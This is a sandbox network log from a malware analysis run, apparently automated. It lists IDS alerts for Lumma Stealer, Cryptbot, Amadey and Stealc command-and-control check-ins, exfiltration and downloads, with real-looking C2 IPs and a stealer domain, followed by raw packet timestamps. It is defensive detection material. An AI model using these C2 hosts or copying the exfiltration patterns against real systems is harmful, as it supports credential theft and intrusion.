                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:50.130333+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449874188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:50.130333+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449874188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:50.928169+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449874188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:50.928169+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449874188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:51.665682+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.44987734.116.198.13080TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:53.864817+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449895188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:53.864817+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449895188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:54.375015+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.44990134.116.198.13080TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:54.762290+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449904188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:54.762290+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449904188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:56.709616+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449912188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:56.709616+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449912188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:58.718633+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449920185.215.113.4380TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:59.680672+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449924188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:10:59.680672+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449924188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:04.475126+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449942188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:04.475126+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449942188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:04.702537+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449916185.215.113.20680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:06.753539+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449916185.215.113.20680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:07.600906+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449954188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:07.600906+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449954188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:07.616458+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449954188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:08.202616+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449916185.215.113.20680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:09.461237+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449916185.215.113.20680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:11.336257+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.449970188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:11.336257+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449970188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:12.057864+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449970188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:13.195861+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449916185.215.113.20680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:13.529653+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449976185.215.113.1680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:14.404324+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449916185.215.113.20680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:20.380126+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.450013185.215.113.1680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:21.163905+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450015188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:21.163905+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450015188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:21.860425+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450015188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:21.860425+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450015188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:24.041143+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450025188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:24.041143+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450025188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:24.758058+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450025188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:24.758058+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450025188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:25.239144+01002054350ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M41192.168.2.45002934.116.198.13080TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:29.094370+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450046188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:29.094370+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450046188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:32.578927+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450057188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:32.578927+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450057188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:34.180350+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450061185.215.113.20680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:38.958680+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450087188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:38.958680+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450087188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:40.547449+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450100188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:40.547449+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450100188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:41.234114+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450100188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:41.234114+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450100188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:41.273369+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450108188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:41.273369+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450108188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:41.868706+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450105185.215.113.20680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:41.985268+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450108188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:43.089608+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450121188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:43.089608+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450121188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:43.799421+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450121188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:43.799421+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450121188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:44.341390+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450128188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:44.341390+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450128188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:45.124798+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.450128188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:46.453210+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450136188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:46.453210+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450136188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:47.222802+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450136188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:48.687100+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.450144185.215.113.1680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:49.397179+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450147188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:49.397179+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450147188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:51.709309+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450154188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:51.709309+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450154188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:53.892117+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450162188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:53.892117+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450162188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:56.180915+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450167188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:56.180915+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450167188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:59.221974+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450178188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:11:59.221974+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450178188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:12:00.237045+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.450178188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:12:01.528454+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450185188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:12:01.528454+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450185188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:12:02.246800+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450185188.114.96.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:12:03.765921+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.450189185.215.113.1680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:12:41.799932+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.45024420.42.65.92443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:13:51.039915+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.45028920.42.65.94443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:15:08.233488+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.450321185.215.113.4380TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:34.049276+01002057730ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs)1192.168.2.4655191.1.1.153UDP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:35.598228+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450373188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:35.598228+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450373188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:35.911413+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.450371TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:36.303833+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450373188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:36.303833+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450373188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:37.255645+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450374185.215.113.4380TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:37.747965+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450375188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:37.747965+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450375188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:38.455610+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450375188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:38.455610+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450375188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:40.061879+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450377188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:40.061879+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450377188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:41.199415+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450378185.215.113.20680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:42.377655+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450380188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:42.377655+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450380188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:42.427577+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450379185.215.113.4380TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:43.284075+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.450380188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:44.614539+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450382188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:44.614539+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450382188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:46.885052+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450383188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:46.885052+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450383188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:47.693777+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450384185.215.113.4380TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:49.610585+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450386188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:49.610585+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450386188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:50.126756+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450387188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:50.126756+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450387188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:50.876881+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.450387188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:50.876881+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450387188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:52.209861+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450390188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:52.209861+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450390188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:52.804072+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450392188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:52.804072+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450392188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:53.043455+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.450390188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:53.043455+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450390188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:53.193279+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.450393185.215.113.4380TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:53.507804+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450392188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:54.493975+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450395188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:54.493975+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450395188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:55.072094+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.450396185.215.113.1680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:56.671400+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450398188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:56.671400+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450398188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:58.938981+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450400188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:58.938981+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450400188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:17:59.149079+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.450399185.215.113.20680TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:18:01.386689+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450402188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:18:01.386689+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450402188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:18:03.976057+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450404188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:18:03.976057+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450404188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:18:04.794622+01002057730ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cook-rain .sbs)1192.168.2.4529001.1.1.153UDP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:18:07.570325+01002057731ET MALWARE Observed Win32/Lumma Stealer Related Domain (cook-rain .sbs in TLS SNI)1192.168.2.450413188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:18:07.570325+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.450413188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:18:08.312997+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.450413188.114.97.3443TCP
                                                                                                                                                                                                                                                                                                            2024-11-21T12:18:09.820088+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.450415185.215.113.1680TCP
                                                                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:03.194901943 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:15.514017105 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:15.514055014 CET44349672173.222.162.32192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:16.465179920 CET49730443192.168.2.44.175.87.197
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:16.465208054 CET443497304.175.87.197192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:16.465277910 CET49730443192.168.2.44.175.87.197
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:16.467303991 CET49730443192.168.2.44.175.87.197
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:16.467317104 CET443497304.175.87.197192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:18.305860996 CET443497304.175.87.197192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:18.305927038 CET49730443192.168.2.44.175.87.197
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:18.314086914 CET49730443192.168.2.44.175.87.197
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:18.314096928 CET443497304.175.87.197192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:18.314497948 CET443497304.175.87.197192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:18.366767883 CET49730443192.168.2.44.175.87.197
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:20.017690897 CET49730443192.168.2.44.175.87.197
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:20.063338995 CET443497304.175.87.197192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:20.619832039 CET443497304.175.87.197192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:20.619858980 CET443497304.175.87.197192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:20.619869947 CET443497304.175.87.197192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:20.619884014 CET443497304.175.87.197192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:20.619890928 CET443497304.175.87.197192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:20.619898081 CET443497304.175.87.197192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:20.619937897 CET49730443192.168.2.44.175.87.197
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:20.619965076 CET443497304.175.87.197192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:20.619998932 CET49730443192.168.2.44.175.87.197
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:20.620043993 CET49730443192.168.2.44.175.87.197
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:20.642236948 CET443497304.175.87.197192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:20.642313004 CET443497304.175.87.197192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:20.642343998 CET49730443192.168.2.44.175.87.197
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:20.642416954 CET49730443192.168.2.44.175.87.197
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:21.935344934 CET49730443192.168.2.44.175.87.197
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:21.935368061 CET443497304.175.87.197192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:21.935544014 CET49730443192.168.2.44.175.87.197
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:21.935549974 CET443497304.175.87.197192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:22.517321110 CET4972380192.168.2.4199.232.214.172
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:22.637046099 CET8049723199.232.214.172192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:09:22.637146950 CET4972380192.168.2.4199.232.214.172
